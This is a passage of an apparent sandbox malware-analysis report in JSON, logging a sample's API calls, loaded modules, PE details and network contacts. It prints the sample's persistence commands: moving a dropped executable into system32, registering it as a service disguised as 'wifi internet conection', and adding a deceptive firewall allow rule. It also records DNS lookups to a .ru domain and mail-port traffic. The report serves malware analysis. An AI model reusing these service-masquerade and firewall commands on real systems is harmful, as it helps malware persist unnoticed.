\"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004380)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00004380)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002572)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00002572)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002572)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002572)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00002572)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00002572)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03eb46a@ADVAPI32.dll\"\n \"0e000f00703fb46a@ADVAPI32.dll\"\n \"0e000f00cc3fb46a@ADVAPI32.dll\"\n \"11001200b447b46a@ADVAPI32.dll\"\n \"110012004848b46a@ADVAPI32.dll\"\n \"120013008c48b46a@ADVAPI32.dll\"\n \"12001300e448b46a@ADVAPI32.dll\"\n \"14001500dc6fb46a@ADVAPI32.dll\"\n \"14001500f46fb46a@ADVAPI32.dll\"\n \"140015000c70b46a@ADVAPI32.dll\"\n \"170018002470b46a@ADVAPI32.dll\"\n \"0d000e003c70b46a@ADVAPI32.dll\"\n \"110012004c70b46a@ADVAPI32.dll\"\n \"110012006070b46a@ADVAPI32.dll\"\n \"0d000e003449b46a@SHELL32.dll\"\n \"0d000e00b049b46a@SHELL32.dll\"\n \"0f001000a071b46a@ADVAPI32.dll\"\n \"14001500e071b46a@ADVAPI32.dll\"\n \"14001500f871b46a@ADVAPI32.dll\"\n \"0c000d004072b46a@ADVAPI32.dll\"\n \"0c000d005072b46a@ADVAPI32.dll\"\n \"0e000f006072b46a@ADVAPI32.dll\"\n \"0e000f007072b46a@ADVAPI32.dll\"\n \"0b000c008072b46a@ADVAPI32.dll\"\n \"18001900b874b46a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005780)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\cygqxrtx\\\" - (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\mpvpepag.exe\" %WINDIR%\\system32\\cygqxrtx\\\" - (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create cygqxrtx binPath= \"%WINDIR%\\system32\\cygqxrtx\\mpvpepag.exe /d\\\"C:\\6e13a1dcc528e5e5ad63a82c4b\" - (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description cygqxrtx \"wifi internet conection\"\" - (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start cygqxrtx\" - (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005780)\n \"mpvpepag.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004252)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mpvpepag.exe\" %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005824)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" has an executable section named \".text\"\n \"mpvpepag.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.67EE5469.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" has an writable section named \".data\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" has an writable section named \".text\"\n \"mpvpepag.exe\" has an writable section named \".data\"\n \"mpvpepag.exe\" has an writable section named \".text\"\n \"DISMHOST.EXE.67EE5469.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xa2e000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xabf000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"mpvpepag.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67EE5469.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"KERNEL32.DLL\" at base 77980000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"WS2_32.DLL\" at base 761d0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"DBGHELP.DLL\" at base 6eee0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"USER32.DLL\" at base 765e0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"ADVAPI32.DLL\" at base 75f80000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"SHELL32.DLL\" at base 76ad0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"OLEAUT32.DLL\" at base 766b0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"MSVCR100.DLL\" at base 696a0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"NTDLL.DLL\" at base 77ca0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"OLE32.DLL\" at base 77770000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"CRYPTBASE.DLL\" at base 75aa0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74670000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"PROPSYS.DLL\" at base 74760000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"COMCTL32.DLL\" at base 74a40000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"APPHELP.DLL\" at base 75a50000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"CLBCATQ.DLL\" at base 75ef0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6ae10000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77980000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"SETUPAPI.DLL\" at base 77b00000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"RPCRT4.DLL\" at base 778d0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74760000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"NTMARTA.DLL\" at base 75010000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76750000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"PROFAPI.DLL\" at base 75bc0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75e50000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76080000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"SECUR32.DLL\" at base 758d0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75bd0000\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a50000\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 76030000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 762a0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71790000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 77980000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"mpvpepag.exe\" loaded module \"GDI32.DLL\" at base 76030000\n \"mpvpepag.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 762a0000\n \"mpvpepag.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71790000\n \"mpvpepag.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"mpvpepag.exe\" loaded module \"KERNEL32\" at base 77980000\n \"mpvpepag.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"mpvpepag.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bbf0000\n \"mpvpepag.exe\" loaded module \"KERNEL32.DLL\" at base 77980000\n \"mpvpepag.exe\" loaded module \"WS2_32.DLL\" at base 761d0000\n \"mpvpepag.exe\" loaded module \"DBGHELP.DLL\" at base 6eee0000\n \"mpvpepag.exe\" loaded module \"USER32.DLL\" at base 765e0000\n \"mpvpepag.exe\" loaded module \"ADVAPI32.DLL\" at base 75f80000\n \"mpvpepag.exe\" loaded module \"SHELL32.DLL\" at base 76ad0000\n \"mpvpepag.exe\" loaded module \"OLEAUT32.DLL\" at base 766b0000\n \"mpvpepag.exe\" loaded module \"MSVCR100.DLL\" at base 66070000\n \"mpvpepag.exe\" loaded module \"SSPICLI.DLL\" at base 75a30000\n \"mpvpepag.exe\" loaded module \"RPCRT4.DLL\" at base 778d0000\n \"mpvpepag.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76750000\n \"mpvpepag.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a50000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71790000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 77980000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bbf0000\n \"netsh.exe\" loaded module \"NSHWFP.DLL\" at base 696b0000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6cbf0000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6c900000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 77980000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6c310000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6bd70000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 695b0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77980000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6c1c0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6aab0000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6c0e0000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6bd60000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6bba0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6a970000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 66020000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 65f60000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 778d0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 65c10000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6d810000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 65b40000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 65740000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6d800000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 65690000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 77770000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75aa0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74670000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 755b0000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 765e0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75ef0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c490000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 75f80000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76750000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76750000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 76750000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76750000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75340000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75b40000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6efd0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75e10000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 75180000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 75280000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 766b0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73f00000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73e10000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 74230000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73e00000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76750000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73b80000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75570000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 75430000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73c10000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 761d0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 778d0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73e70000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 722f0000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 75a30000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76750000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 750d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005780)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004136)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004136)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004136)\n \"sc.exe\" called \"LoadLibrary\" with a parameter 